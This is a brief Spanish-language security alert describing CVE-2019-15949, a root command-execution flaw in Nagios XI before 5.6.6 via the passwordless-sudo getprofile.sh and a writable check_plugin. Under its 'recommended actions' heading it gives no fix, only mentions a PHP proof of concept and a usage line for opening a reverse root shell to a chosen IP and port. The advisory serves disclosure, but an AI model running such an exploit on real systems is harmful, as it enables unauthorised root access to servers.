Alertas de seguridad

Vulnerabilidad en Nagios XI

El caso 2019-15949 indica que Nagios XI antes de 5.6.6 permite la ejecución remota de comandos como root. El exploit requiere acceso al servidor como usuario nagios, o acceso como usuario administrador a través de la interfaz web. El script getprofile.sh, invocado al descargar un perfil del sistema (profile.php? Cmd = download), se ejecuta como root a través de una entrada de sudo sin contraseña; el script ejecuta check_plugin, propiedad del usuario nagios. Un usuario que inició sesión en Nagios XI con permisos para modificar complementos, o el usuario de nagios en el servidor, puede modificar el ejecutable check_plugin e insertar comandos maliciosos para ejecutar como root.

vulnerabilidad nagios

Acciones recomendadas

Se ha desarrollado un PHP POC para una carga útil que da como resultado un shell raíz inverso.

Uso
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port.

 

 

Topics: vulnerabilidad de seguridad Vulnerabilidad en Nagios XI